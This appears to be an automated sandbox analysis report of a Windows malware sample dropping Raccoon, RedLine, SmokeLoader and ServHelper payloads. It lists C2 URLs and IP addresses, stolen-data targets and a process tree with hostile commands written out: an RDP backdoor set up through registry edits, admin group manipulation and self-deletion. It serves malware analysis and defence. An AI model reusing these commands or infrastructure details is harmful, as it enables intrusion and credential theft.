raccoon | 908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900

Analysis

max time kernel
151s
max time network
142s
platform
windows10_x64
resource
win10-en-20210920
submitted
12-10-2021 18:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe
Size

222KB
MD5

75bce9ab588ea2382852d9408228edd7
SHA1

9e334f657b509462d2fa4565d23afab3137b9853
SHA256

908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900
SHA512

c0efd53019309e6a7634db0402ebb12632b9028bcf8e5df1f4498c8954c90ad3ca1a56895d38ac485832133b890626e120dd1cfb297f304221f303204cfb6b7d

Score

10^/10

raccoon redline servhelper smokeloader xmrig 676b1a32c7d2ce2aba84e8823871900d67e00049 megaproliv newpro w1 backdoor collection discovery infostealer miner persistence spyware stealer suricata trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://linavanandr11.club/

http://iselaharty12.club/

http://giovaninardo13.club/

http://zayneliann14.club/

http://zorinosali15.club/

rc4.i32

Extracted

Family

redline

Botnet

109.234.34.165:12323

Extracted

Family

raccoon

Version

1.8.2

Botnet

676b1a32c7d2ce2aba84e8823871900d67e00049

Attributes

url4cnc
http://telemirror.top/kaba4ello

http://tgmirror.top/kaba4ello

http://telegatt.top/kaba4ello

http://telegka.top/kaba4ello

http://telegin.top/kaba4ello

https://t.me/kaba4ello

rc4.plain

Extracted

Family

redline

Botnet

Newpro

139.99.118.252:12517

Extracted

Family

redline

Botnet

MegaProliv

93.115.20.139:28978

Signatures

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 7 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3704-126-0x00000000001A0000-0x00000000001D1000-memory.dmp	family_redline
behavioral1/memory/3704-131-0x0000000002640000-0x000000000265C000-memory.dmp	family_redline
behavioral1/memory/1324-163-0x000000000C9B0000-0x000000000C9ED000-memory.dmp	family_redline
behavioral1/memory/1324-166-0x000000000CC40000-0x000000000CC7C000-memory.dmp	family_redline
behavioral1/memory/1788-183-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/1788-186-0x000000000041B25E-mapping.dmp	family_redline
behavioral1/memory/1788-196-0x00000000052B0000-0x00000000058B6000-memory.dmp	family_redline

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
suricata
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

F9C2.exeD8.exeA10.exeF51.exe18C8.exeF51.exe

pid process

2804 F9C2.exe
3704 D8.exe
616 A10.exe
1112 F51.exe
1324 18C8.exe
1788 F51.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Deletes itself 1 IoCs

Processes:

pid process

1588
Loads dropped DLL 5 IoCs

Processes:

F9C2.exe

pid process

2804 F9C2.exe
2804 F9C2.exe
2804 F9C2.exe
2804 F9C2.exe
2804 F9C2.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2804	F9C2.exe
3704	D8.exe
616	A10.exe
1112	F51.exe
1324	18C8.exe
1788	F51.exe

pid	process
1588

pid	process
2804	F9C2.exe
2804	F9C2.exe
2804	F9C2.exe
2804	F9C2.exe
2804	F9C2.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

F9C2.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	F9C2.exe

Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs

collection

Email Collection

T1114

Processes:

F9C2.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook	F9C2.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	F9C2.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	F9C2.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook	F9C2.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook	F9C2.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	F9C2.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook	F9C2.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook	F9C2.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\rdpclip.exe	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exeF51.exe

description	pid	process	target process
PID 2384 set thread context of 2940	2384	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe
PID 1112 set thread context of 1788	1112	F51.exe	F51.exe

Drops file in Windows directory 8 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2292 timeout.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3884 reg.exe
Runs net.exe

pid	process
2292	timeout.exe

pid	process
3884	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe

pid	process
2940	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe
2940	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1588
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

636
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe

pid process

2940 908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe

pid	process
1588

pid	process
636

Suspicious use of AdjustPrivilegeToken 37 IoCs

Processes:

D8.exeF51.exe18C8.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeDebugPrivilege	3704	D8.exe
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeDebugPrivilege	1788	F51.exe
Token: SeDebugPrivilege	1324	18C8.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	3932	powershell.exe
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pid process

1588
1588
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

pid process

1588
1588

pid	process
1588
1588

pid	process
1588
1588

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exeF51.exeA10.exepowershell.execsc.exenet.exe

description	pid	process	target process
PID 2384 wrote to memory of 2940	2384	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe
PID 2384 wrote to memory of 2940	2384	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe
PID 2384 wrote to memory of 2940	2384	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe
PID 2384 wrote to memory of 2940	2384	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe
PID 2384 wrote to memory of 2940	2384	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe
PID 2384 wrote to memory of 2940	2384	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe	908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe
PID 1588 wrote to memory of 2804	1588		F9C2.exe
PID 1588 wrote to memory of 2804	1588		F9C2.exe
PID 1588 wrote to memory of 2804	1588		F9C2.exe
PID 1588 wrote to memory of 3704	1588		D8.exe
PID 1588 wrote to memory of 3704	1588		D8.exe
PID 1588 wrote to memory of 3704	1588		D8.exe
PID 1588 wrote to memory of 616	1588		A10.exe
PID 1588 wrote to memory of 616	1588		A10.exe
PID 1588 wrote to memory of 616	1588		A10.exe
PID 1588 wrote to memory of 1112	1588		F51.exe
PID 1588 wrote to memory of 1112	1588		F51.exe
PID 1588 wrote to memory of 1112	1588		F51.exe
PID 1112 wrote to memory of 1788	1112	F51.exe	F51.exe
PID 1112 wrote to memory of 1788	1112	F51.exe	F51.exe
PID 1112 wrote to memory of 1788	1112	F51.exe	F51.exe
PID 1588 wrote to memory of 1324	1588		18C8.exe
PID 1588 wrote to memory of 1324	1588		18C8.exe
PID 1588 wrote to memory of 1324	1588		18C8.exe
PID 1112 wrote to memory of 1788	1112	F51.exe	F51.exe
PID 1112 wrote to memory of 1788	1112	F51.exe	F51.exe
PID 1112 wrote to memory of 1788	1112	F51.exe	F51.exe
PID 1112 wrote to memory of 1788	1112	F51.exe	F51.exe
PID 1112 wrote to memory of 1788	1112	F51.exe	F51.exe
PID 616 wrote to memory of 1424	616	A10.exe	powershell.exe
PID 616 wrote to memory of 1424	616	A10.exe	powershell.exe
PID 616 wrote to memory of 1424	616	A10.exe	powershell.exe
PID 1424 wrote to memory of 3936	1424	powershell.exe	csc.exe
PID 1424 wrote to memory of 3936	1424	powershell.exe	csc.exe
PID 1424 wrote to memory of 3936	1424	powershell.exe	csc.exe
PID 3936 wrote to memory of 980	3936	csc.exe	cvtres.exe
PID 3936 wrote to memory of 980	3936	csc.exe	cvtres.exe
PID 3936 wrote to memory of 980	3936	csc.exe	cvtres.exe
PID 1424 wrote to memory of 1988	1424	powershell.exe	powershell.exe
PID 1424 wrote to memory of 1988	1424	powershell.exe	powershell.exe
PID 1424 wrote to memory of 1988	1424	powershell.exe	powershell.exe
PID 1424 wrote to memory of 3932	1424	powershell.exe	powershell.exe
PID 1424 wrote to memory of 3932	1424	powershell.exe	powershell.exe
PID 1424 wrote to memory of 3932	1424	powershell.exe	powershell.exe
PID 1424 wrote to memory of 1812	1424	powershell.exe	powershell.exe
PID 1424 wrote to memory of 1812	1424	powershell.exe	powershell.exe
PID 1424 wrote to memory of 1812	1424	powershell.exe	powershell.exe
PID 1424 wrote to memory of 2192	1424	powershell.exe	reg.exe
PID 1424 wrote to memory of 2192	1424	powershell.exe	reg.exe
PID 1424 wrote to memory of 2192	1424	powershell.exe	reg.exe
PID 1424 wrote to memory of 3884	1424	powershell.exe	reg.exe
PID 1424 wrote to memory of 3884	1424	powershell.exe	reg.exe
PID 1424 wrote to memory of 3884	1424	powershell.exe	reg.exe
PID 1424 wrote to memory of 3960	1424	powershell.exe	reg.exe
PID 1424 wrote to memory of 3960	1424	powershell.exe	reg.exe
PID 1424 wrote to memory of 3960	1424	powershell.exe	reg.exe
PID 1424 wrote to memory of 2444	1424	powershell.exe	net.exe
PID 1424 wrote to memory of 2444	1424	powershell.exe	net.exe
PID 1424 wrote to memory of 2444	1424	powershell.exe	net.exe
PID 2444 wrote to memory of 2180	2444	net.exe	net1.exe
PID 2444 wrote to memory of 2180	2444	net.exe	net1.exe
PID 2444 wrote to memory of 2180	2444	net.exe	net1.exe
PID 1424 wrote to memory of 3264	1424	powershell.exe	cmd.exe
PID 1424 wrote to memory of 3264	1424	powershell.exe	cmd.exe

outlook_office_path 1 IoCs

Processes:

F9C2.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook	F9C2.exe

outlook_win_path 1 IoCs

Processes:

F9C2.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	F9C2.exe

C:\Users\Admin\AppData\Local\Temp\908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe
"C:\Users\Admin\AppData\Local\Temp\908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2384
- C:\Users\Admin\AppData\Local\Temp\908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe
  "C:\Users\Admin\AppData\Local\Temp\908b0f7fc162811ba41342257a420ed9372761de08184cdadef2fb3a6659a900.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:2940

C:\Users\Admin\AppData\Local\Temp\F9C2.exe
C:\Users\Admin\AppData\Local\Temp\F9C2.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:2804
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\F9C2.exe"
  2⤵
  PID:2748
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:2292

C:\Users\Admin\AppData\Local\Temp\D8.exe
C:\Users\Admin\AppData\Local\Temp\D8.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3704

C:\Users\Admin\AppData\Local\Temp\A10.exe
C:\Users\Admin\AppData\Local\Temp\A10.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:616
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1424
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ekkzyg3h\ekkzyg3h.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3936
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B97.tmp" "c:\Users\Admin\AppData\Local\Temp\ekkzyg3h\CSCAA2795E3AF9D46C8B48074DF9A7E2C.TMP"
      4⤵
      PID:980
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1988
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3932
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:3884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:3960
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2444
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    PID:3264
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c net start rdpdr
      4⤵
      PID:3396
    - - C:\Windows\SysWOW64\net.exe
        
        net start rdpdr
        5⤵
        
        PID:1644
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:1152
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:604
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:424
    - - C:\Windows\SysWOW64\net.exe
        
        net start TermService
        5⤵
        
        PID:740
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:2096

C:\Users\Admin\AppData\Local\Temp\F51.exe
C:\Users\Admin\AppData\Local\Temp\F51.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1112
- C:\Users\Admin\AppData\Local\Temp\F51.exe
  C:\Users\Admin\AppData\Local\Temp\F51.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1788

C:\Users\Admin\AppData\Local\Temp\18C8.exe
C:\Users\Admin\AppData\Local\Temp\18C8.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1324

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\F51.exe.log

MD5
41fbed686f5700fc29aaccf83e8ba7fd

SHA1
5271bc29538f11e42a3b600c8dc727186e912456

SHA256
df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

SHA512
234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
f3068198b62b4b70404ec46694d632be

SHA1
7b0b31ae227cf2a78cb751573a9d07f755104ea0

SHA256
bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8

SHA512
ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795

Download Submit
C:\Users\Admin\AppData\Local\Temp\18C8.exe

MD5
5a79659f43aeee5f46d0537054422948

SHA1
8bbd07f91bcbf9ac6bd940726215d0c6809ccb31

SHA256
b084e1e1eb26a99f9b9185fa7e288dc68967601a5c9703a5f16ef12ebc37e689

SHA512
632f12fa66437b6e05fe899442a76c9088f3d8ddc9e9517169a73e032be110531b9cb4a3086429c3ccfe9ca0615f813d2a5da616a6597db48426f3dc29bc7647

Download Submit
C:\Users\Admin\AppData\Local\Temp\18C8.exe

MD5
5a79659f43aeee5f46d0537054422948

SHA1
8bbd07f91bcbf9ac6bd940726215d0c6809ccb31

SHA256
b084e1e1eb26a99f9b9185fa7e288dc68967601a5c9703a5f16ef12ebc37e689

SHA512
632f12fa66437b6e05fe899442a76c9088f3d8ddc9e9517169a73e032be110531b9cb4a3086429c3ccfe9ca0615f813d2a5da616a6597db48426f3dc29bc7647

Download Submit
C:\Users\Admin\AppData\Local\Temp\A10.exe

MD5
2686d02fd6a82432c2bbfccdf7f334de

SHA1
75c80a6877c6e0724d19de0f5149bed186760e27

SHA256
35270b20b568beb5f844e1b8c9bfe53498cfbac02633a9cb3ca5927a2cba4e4d

SHA512
22333918e2fed9e39c967313f77844b6bc4f3a2dbfe97223c08def7b80057b7c89f5b75460575172e99c11ee2b824c66e4417588a12ae6a314968c2a34d01698

Download Submit
C:\Users\Admin\AppData\Local\Temp\A10.exe

MD5
2686d02fd6a82432c2bbfccdf7f334de

SHA1
75c80a6877c6e0724d19de0f5149bed186760e27

SHA256
35270b20b568beb5f844e1b8c9bfe53498cfbac02633a9cb3ca5927a2cba4e4d

SHA512
22333918e2fed9e39c967313f77844b6bc4f3a2dbfe97223c08def7b80057b7c89f5b75460575172e99c11ee2b824c66e4417588a12ae6a314968c2a34d01698

Download Submit
C:\Users\Admin\AppData\Local\Temp\D8.exe

MD5
f5c4d463115dc020d5ec1756da0258a0

SHA1
b66eb6992d7c0191d1255ae0ada35b6403221425

SHA256
fa0bcd10cdc9df5fe9806e16a933d71d49c93fb6b21e75e2215bb728212b570e

SHA512
854bbe52abf339b75e68c20aef0b905fb29c4c2580a44b957b6d6b02889b78a44f6605a2e45f61f358b7b63d3530b61f6bad513f0672bcef06268d9ea1c55350

Download Submit
C:\Users\Admin\AppData\Local\Temp\D8.exe

MD5
f5c4d463115dc020d5ec1756da0258a0

SHA1
b66eb6992d7c0191d1255ae0ada35b6403221425

SHA256
fa0bcd10cdc9df5fe9806e16a933d71d49c93fb6b21e75e2215bb728212b570e

SHA512
854bbe52abf339b75e68c20aef0b905fb29c4c2580a44b957b6d6b02889b78a44f6605a2e45f61f358b7b63d3530b61f6bad513f0672bcef06268d9ea1c55350

Download Submit
C:\Users\Admin\AppData\Local\Temp\F51.exe

MD5
3de1b117e92c82530bb90a01b5d5d51e

SHA1
8aec1842e379c1c6d9be27e5f144f037fed18432

SHA256
789f7812529efd3dbc528dedb06fa088e4243e6ffb7acc9eaaa54416130e0996

SHA512
ae015b693734f245df616bcbd51ad73047c6ee87235e82414ef461b13271361272fa3d70a63fef5d1f18311169b60f6a297aa91c740f03d90075862dd074f047

Download Submit
C:\Users\Admin\AppData\Local\Temp\F51.exe

MD5
3de1b117e92c82530bb90a01b5d5d51e

SHA1
8aec1842e379c1c6d9be27e5f144f037fed18432

SHA256
789f7812529efd3dbc528dedb06fa088e4243e6ffb7acc9eaaa54416130e0996

SHA512
ae015b693734f245df616bcbd51ad73047c6ee87235e82414ef461b13271361272fa3d70a63fef5d1f18311169b60f6a297aa91c740f03d90075862dd074f047

Download Submit
C:\Users\Admin\AppData\Local\Temp\F51.exe

MD5
3de1b117e92c82530bb90a01b5d5d51e

SHA1
8aec1842e379c1c6d9be27e5f144f037fed18432

SHA256
789f7812529efd3dbc528dedb06fa088e4243e6ffb7acc9eaaa54416130e0996

SHA512
ae015b693734f245df616bcbd51ad73047c6ee87235e82414ef461b13271361272fa3d70a63fef5d1f18311169b60f6a297aa91c740f03d90075862dd074f047

Download Submit
C:\Users\Admin\AppData\Local\Temp\F9C2.exe

MD5
304fc140f23e50e1ca9c753d7ead32c6

SHA1
55db5552e5ac7a0e6ced8cd7e1ad2af2e3bf089e

SHA256
62b627269aeb306a6c25c7b118ede17354d0191b7a3ae1abbe44a7869239e9ae

SHA512
b13b8ed9ec826dd5d9ab4ae67d407556e08a1a11330e8320bf513b01ef3e710a3259874085009ad92002a999d8618c77054eeb31803e28b2bda3a97066e77e22

Download Submit
C:\Users\Admin\AppData\Local\Temp\F9C2.exe

MD5
304fc140f23e50e1ca9c753d7ead32c6

SHA1
